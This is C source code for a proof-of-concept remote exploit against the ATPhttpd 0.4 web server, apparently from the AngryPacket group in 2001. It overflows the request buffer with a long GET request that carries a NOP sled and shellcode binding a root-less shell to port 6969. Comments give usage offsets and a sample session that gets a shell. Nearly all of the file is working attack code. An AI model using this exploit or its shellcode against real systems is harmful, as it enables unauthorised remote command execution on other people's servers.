Proof of concept exploit for ATPhttpd 0.4
--
+ methodic >> [http://methodic.angrypacket.com] -- -
+ Cannot find nsabackdoor.dll. Please reinstall Windows.
/* remote exploit for ATPhttpd 0.4 */
/* $Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */
/* Another 31336++ codez from AngryPacket */
/*
* "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
* was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the
* source for the hell of it. Ran ye old perl Ax4000|nc and did some
* gdb'n and noticed that it said the return address was 0x41414141.
* Well that speaks for itself...
*
* - dmuz@angrypacket.com
*/
/*
* developed and tested against OpenBSD. exploit creates a port-binding
* shell on the remote machine on port 6969 with the uid of the server.
* try offsets between 5000 and -5000 with increments of 100. -200 worked
* like a charm for me.
*
* ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
* [methodic@vulnhost] [~]$ nc localhost 6969
* whoami
* methodic
* id
* uid=1009(methodic) gid=1009(methodic)
* ^C punt!
*
* mad thankz to vegac who helped me with a lame bug i was over looking
*/
/* this exploit code by methodic with a little from dmuz */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
/* 701 A's to own the EIP */
#define LEN 900
#define NOP 0x90
/* port binding shellcode (6969/tcp) by noir */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
int sockfd=0, port=0, offset=0;
int ch, i;
long retaddr;
char *host=NULL, http_request[LEN+20];
char *payload, *ptr=(char *)&shellcode;
struct sockaddr_in s;
while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
switch (ch) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'o':
offset = atol(optarg);
break;
}
}
printf(">> atphttpd 0.4b exploit, written by angrypacket security crew\n");
if(!host) {
usage(argv[0]);
}
if(!port) {
port = 80;
}
/* setup socket structure */
bzero(&s, sizeof(s));
s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr.s_addr = inet_addr(host);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror(" + socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
perror(" + connect");
exit(1);
}
/* build c0dez.. */
payload = (char *)malloc(LEN);
retaddr = get_sp() - offset;
printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n", retaddr, offset);
/* fill the buffer with return addr's */
for(i = 0; i < LEN; i += 4)
*(long *)&payload[i] = retaddr;
/* fill in some NOPs */
for(i = 0; i < ((LEN/2) - 100); i++)
*(payload + i) = NOP;
/* copy the shellcode and terminate the payload string */
memcpy(payload + i, ptr, strlen(ptr));
payload[LEN-1] = '\0';
bzero(&http_request, LEN+20);
strcpy(http_request, "GET ");
strcat(http_request, payload);
strcat(http_request, " HTTP/1.0\r\n\r\n");
free(payload);
printf(" + sending payload to <%s> on port [%d].. ", host, port);
send(sockfd, http_request, strlen(http_request), 0);
printf("done\n");
close(sockfd);
printf(" + now connect to port 6969 on <%s> (be good!)\n", host);
printf(">> visit http://sec.angrypacket.com for more security tools\n");
return(0);
}
int usage(char *progname) {
fprintf(stderr, "usage: %s -h <target ip> -p <target port> -o <offset>\n", progname);
exit(0);
}
